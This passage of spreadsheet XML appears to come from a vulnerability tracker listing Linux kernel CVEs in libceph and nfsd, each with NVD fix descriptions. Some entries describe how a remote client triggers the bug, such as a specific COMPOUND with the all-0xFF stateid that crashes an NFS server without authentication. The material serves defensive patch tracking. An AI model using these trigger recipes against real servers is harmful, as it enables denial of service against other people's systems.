          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89657</t>
        </is>
      </c>
      <c r="D502" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F502" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr"/>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
libceph: validate OSD extent maps before cursor advance
net/ceph/osd_client.c:osd_sparse_read() validates that the sparse-read
data length matches the summed extent lengths, but it does not validate
that each OSD-supplied extent is monotonic and lies inside the original
request range. A malformed authenticated OSD reply can advertise a
far-forward nonzero extent offset with a matching data length and make
the client advance the message-data cursor beyond the request buffer.
This reaches the BUG_ON(!*length) assertion in ceph_msg_data_next() from
the client receive path.
Impact: A malicious or compromised authenticated Ceph OSD peer can crash
a kernel Ceph client via a malformed sparse-read reply.
Reject sparse extent maps that overflow, move backwards, overlap, or
extend outside the original sparse-read request before advancing the
cursor.
[ idryomov: perform sparse_extent_map_valid() check a bit earlier,
  in CEPH_SPARSE_READ_DATA_LEN instead of CEPH_SPARSE_READ_DATA_PRE
  state ]</t>
        </is>
      </c>
      <c r="S502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89657</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89664</t>
        </is>
      </c>
      <c r="D503" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F503" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr"/>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: release OPEN-decoded posix ACLs via op_release
nfsd4_decode_createhow4() calls nfsd4_decode_fattr4(), which allocates
refcounted struct posix_acl objects via posix_acl_alloc() and stores
them in open-&gt;op_pacl and open-&gt;op_dpacl. These pointers must be
released once the OPEN compound finishes.
When nfsd4_decode_open_claim4() returns a non-seqid-mutating error,
the dispatcher short-circuits before op_func runs:
    nfsd4_proc_compound()
      if (op-&gt;status &amp;&amp; op-&gt;opnum == OP_OPEN)
          op-&gt;status = nfsd4_open_omfg(...)
              if (!seqid_mutating_err(ntohl(op-&gt;status)))
                  return op-&gt;status;   /* nfsd4_open() never runs */
      ...
      opdesc-&gt;op_release(&amp;op-&gt;u)  /* must still release op_pacl/op_dpacl */
Before this change OP_OPEN had no .op_release in nfsd4_ops[], and the
release pair lived inside nfsd4_open() at its out_err: label. On the
short-circuit path nfsd4_open() is never invoked, so both posix_acl
refs leak on every malformed OPEN compound that carries valid POSIX
ACL createhow4 attributes.
Add nfsd4_open_release() and wire it as .op_release for OP_OPEN.
posix_acl_release() is NULL-safe, so the single release site covers
both the normal path and the nfsd4_open_omfg short-circuit. Remove
the matching posix_acl_release() pair from nfsd4_open()'s out_err:
label to avoid double-releasing.
The compound loop has two encoding branches: nfsd4_encode_operation()
for normal ops, and nfsd4_encode_replay() for v4.0 replayed ops.
op_release was only called from nfsd4_encode_operation(), so resources
attached to op-&gt;u leak on the replay path.
Move the op_release() call out of nfsd4_encode_operation() and the
replay branch, placing it after the if-else in nfsd4_proc_compound().
This gives a single call site in a fairly obviously-correct place,
covering both the normal encoding and replay paths.</t>
        </is>
      </c>
      <c r="S503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89664</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89678</t>
        </is>
      </c>
      <c r="D504" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F504" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr"/>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix partial-write detection in nfsd_direct_write
nfsd_direct_write() walks a list of write segments and, after each
vfs_iocb_iter_write(), tries to detect a short write so the loop can
stop before placing the next segment at a wrong file offset:
    host_err = vfs_iocb_iter_write(file, kiocb, &amp;segments[i].iter);
    if (host_err &lt; 0)
            return host_err;
    *cnt += host_err;
    if (host_err &lt; segments[i].iter.count)
            break;	/* partial write */
vfs_iocb_iter_write() runs the iter through -&gt;write_iter(), which
advances the iter by the number of bytes written. By the time the
check runs, segments[i].iter.count is the residual, not the original
request length:
    before write_iter: iter.count == original_len
    after  write_iter: iter.count == original_len - host_err
The condition then reduces to host_err &lt; original_len - host_err, so
the break fires only when less than half of the segment was written.
Any short write completing between 50% and 99% of the segment slips
through; the loop advances to the next segment with kiocb-&gt;ki_pos
only bumped by the short amount, writing the next segment's payload
at the wrong offset and over-reporting *cnt to the NFS client.
Snapshot the segment's byte count before the write and compare
host_err against that snapshot so any short write breaks the loop.</t>
        </is>
      </c>
      <c r="S504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89678</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89679</t>
        </is>
      </c>
      <c r="D505" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F505" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr"/>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix null dereference in nfsd4_setattr for deleg timestamp attrs
When a SETATTR request includes FATTR4_WORD2_TIME_DELEG_ACCESS or
FATTR4_WORD2_TIME_DELEG_MODIFY in the attribute bitmap, nfsd4_setattr()
sets deleg_attrs=true and calls nfs4_preprocess_stateid_op() to validate
the stateid.
If the client supplies the NFSv4 "one stateid" (all-0xFF bytes),
check_special_stateids() returns nfs_ok without populating the output
nfs4_stid pointer, because the special-stateid path in
nfs4_preprocess_stateid_op() jumps to done: with s==NULL, and the
"if (s)" block that would set *cstid is skipped. The local variable `st`
remains NULL.
Back in nfsd4_setattr(), the if (deleg_attrs) block then unconditionally
dereferences st-&gt;sc_type (at offset 4 from NULL), causing a kernel oops.
This is remotely triggerable by any NFSv4 client: send COMPOUND [PUTROOTFH,
SETATTR(ONE_STATEID, {bmval2=FATTR4_WORD2_TIME_DELEG_ACCESS, ...})].
No authentication, delegation, or prior state is required.
Fix by adding a NULL check before the dereference. A special stateid is
not a delegation stateid, so the existing nfserr_bad_stateid return value
is already correct; we only need to guard the pointer dereference itself.</t>
        </is>
      </c>
      <c r="S505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89679</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89680</t>
        </is>
      </c>
      <c r="D506" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F506" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr"/>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix nfsd_file leak on inter-server COPY setup failure
When nfsd4_setup_inter_ssc() fails, nfsd4_copy() returns
nfserr_offload_denied directly, bypassing the out: label where
release_copy_files() would drop the nf_dst reference taken by
nfs4_preprocess_stateid_op(). Each failed inter-server COPY
leaks one nfsd_file, pinning file/inode/dentry/vfsmount.
Fix by setting status and jumping to out: instead of returning
directly.</t>
        </is>
      </c>
      <c r="S506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89680</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89684</t>
        </is>
      </c>
      <c r="D507" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F507" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr"/>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix cpntf publish race in nfs4_init_cp_state
nfs4_alloc_init_cpntf_state() published the new cpntf entry into the
s2s_cp_stateids IDR (with cs_type set) in one s2s_cp_lock section, then
took the lock again to list_add() it onto p_stid-&gt;sc_cp_list. In the gap
the entry is reachable by so_id but cp_list is still {NULL,NULL} from
kzalloc. A racing OFFLOAD_CANCEL (so_id is echoed to the client as
cnr_stateid, so any NFSv4.2 client can drive it) reaches
manage_cpntf_state() -&gt; _free_cpntf_state_locked() and does list_del() on
the zeroed list_head, oopsing the server.
Fold the cs_type assignment and the list_add() into the same critical
section as idr_alloc_cyclic(), so a concurrent lookup either misses the
entry or sees a fully linked cp_list. INIT_LIST_HEAD() the entry after
allocation and switch _free_cpntf_state_locked() to list_del_init() so a
stale unlink is a no-op. nfs4_init_copy_state() passes NULL p_stid and
skips the list_add, preserving NFS4_COPY_STID semantics.</t>
        </is>
      </c>
      <c r="S507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89684</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89685</t>
        </is>
      </c>
      <c r="D508" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F508" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr"/>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix clock domain mismatch in clients_still_reclaiming()
clients_still_reclaiming() computes a deadline from nn-&gt;boot_time
(CLOCK_REALTIME, ~1.7 billion) but compares it against
ktime_get_boottime_seconds() (CLOCK_BOOTTIME, seconds since boot).
The comparison is always false — it would take ~54 years of uptime
for BOOTTIME to exceed the REALTIME-derived deadline.
This means any client can hold the server in grace indefinitely by
sending CLAIM_PREVIOUS OPEN requests, blocking all non-reclaim
operations for all other clients.
Add boot_time_bt (CLOCK_BOOTTIME) alongside the existing boot_time
and use it for the deadline computation. boot_time (CLOCK_REALTIME)
is preserved for its cl_boot clientid-nonce role.</t>
        </is>
      </c>
      <c r="S508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89685</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89687</t>
        </is>
      </c>
      <c r="D509" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F509" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr"/>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: ensure nfsd_file_do_acquire() does not use a non-opened file
-&gt;atomic_open is permitted to return success without actually opening
the file.  It indicates this by calling finish_no_open().
This means dentry_create() can return a file which hasn't been opened.
This is extremely unlikely as -&gt;atomic_open handlers typically
use finish_no_open() only for already existing files, and dentry_create()
isn't called in that case, and the parent being locked should prevent
races.
However out of an abundance of caution it seems wise to teach nfsd to
only use the file returned by dentry_create() if FMODE_OPENED is set,
indicating that it has in fact been opened.</t>
        </is>
      </c>
      <c r="S509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89687</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89692</t>
        </is>
      </c>
      <c r="D510" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F510" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr"/>
      <c r="Q510" s="5" t="inlineStr"/>
      <c r="R510" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: clear CALLBACK_RUNNING on failed delegation recall queue
nfsd_break_one_deleg() sets NFSD4_CALLBACK_RUNNING via test_and_set_bit
at entry to serialize recall work, then calls nfsd4_run_cb() to queue
the recall.  When the queue attempt fails the refcount bump is undone,
but the RUNNING bit is left set.  The only site that clears the bit is
nfsd41_destroy_cb() (fs/nfsd/nfs4callback.c), which runs from the
workqueue and is therefore unreachable when nothing was queued.
The bit becomes a permanent latch on dp-&gt;dl_recall.cb_flags: every
subsequent break_lease() on the same delegation hits the early-return
guard in nfsd_break_one_deleg() and silently skips the recall, so the
delegation is never broken and the conflicting open or lock stalls.
Fix by clearing NFSD4_CALLBACK_RUNNING on the !queued branch alongside
the refcount_dec.</t>
        </is>
      </c>
      <c r="S510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89692</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89695</t>
        </is>
      </c>
      <c r="D511" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F511" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr"/>
      <c r="Q511" s="5" t="inlineStr"/>
      <c r="R511" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: cap decoded POSIX ACL count to bound sort cost
nfsd4_decode_posixacl() reads a u32 entry count off the wire and passes
it straight to posix_acl_alloc() and sort_pacl_range(). The latter is
an O(n^2) bubble sort, so a client-chosen count drives unbounded CPU in
the server's compound processing path.
    nfsd4_decode_posixacl()
      xdr_stream_decode_u32(&amp;count)       /* uncapped u32 */
      posix_acl_alloc(count, GFP_KERNEL)
      sort_pacl_range(*acl, 0, count - 1) /* O(n^2) bubble sort */
The encoder side in the same file already rejects ACLs whose a_count
exceeds NFS_ACL_MAX_ENTRIES, but the decoder introduced in commit
5fc51dfc2eb1 ("NFSD: Add support for XDR decoding POSIX draft ACLs")
omitted the symmetric check.
Fix by rejecting a wire count greater than NFS_ACL_MAX_ENTRIES with
nfserr_inval, before any allocation, so the sort is bounded by
NFS_ACL_MAX_ENTRIES^2 comparisons.
While we're in here, also fix the nfserr_resource return if
posix_acl_alloc() fails. That's not a legal error code for v4.1+. Change
it to return nfserr_jukebox as that's more appropriate for memory
allocation failures.</t>
        </is>
      </c>
      <c r="S511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89695</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89696</t>
        </is>
      </c>
      <c r="D512" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F512" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr"/>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: block non-SAVEFH ops after FOREIGN PUTFH to prevent NULL deref
When CONFIG_NFSD_V4_2_INTER_SSC is enabled, nfsd4_putfh() can return
success with fh_dentry and fh_export both NULL if fh_verify() returns
nfserr_stale and putfh-&gt;no_verify is true. The NFSD4_FH_FOREIGN flag
is set, but the compound dispatch loop only uses this flag to bypass
the nfserr_nofilehandle check -- it does not prevent subsequent ops
from running with a NULL fh_dentry.
A remote client can exploit this by crafting a COMPOUND that includes
an inter-SSC COPY (which causes check_if_stalefh_allowed() to set
no_verify=true on the saved PUTFH) with an additional op inserted
between the source PUTFH and SAVEFH. For example, SETATTR calls
fh_want_write() which dereferences fh_export-&gt;ex_path.mnt without
calling fh_verify() first, causing a NULL pointer dereference in the
nfsd kthread.
Fix this by gating the dispatch loop: when NFSD4_FH_FOREIGN is set
and fh_dentry is NULL, only OP_SAVEFH (needed for the inter-SSC flow)
and ops with ALLOWED_WITHOUT_FH (which don't need a resolved
filehandle) may proceed. All other ops receive nfserr_stale, per
RFC 7862 Section 15.2.3 which specifies that foreign filehandle
validation is deferred to the consuming operation and NFS4ERR_STALE
returned at that point.</t>
        </is>
      </c>
      <c r="S512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89696</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89699</t>
        </is>
      </c>
      <c r="D513" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F513" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr"/>
      <c r="Q513" s="5" t="inlineStr"/>
      <c r="R513" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: validate symlink target length in NFSv4 CREATE
nfsd4_decode_create() accepts an unbounded cr_datalen from the wire for
NF4LNK symlink targets, allowing a client to force a kmalloc of up to
the maximum RPC payload size (several MiB) per COMPOUND op that persists
until compound teardown.  The VFS rejects oversized targets with
ENAMETOOLONG, but the allocation has already occurred.
Reject cr_datalen == 0 early with nfserr_inval and cr_datalen greater
than NFS4_MAXPATHLEN (PATH_MAX) with nfserr_nametoolong to bound the
allocation.</t>
        </is>
      </c>
      <c r="S513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89699</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89704</t>
        </is>
      </c>
      <c r="D514" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F514" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr"/>
      <c r="Q514" s="5" t="inlineStr"/>
      <c r="R514" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: sample writeback error cursor before async COPY loop
_nfsd_copy_file_range() samples dst-&gt;f_wb_err into "since"
after the copy loop, then uses it to detect writeback errors
via filemap_check_wb_err() once vfs_fsync_range() returns.
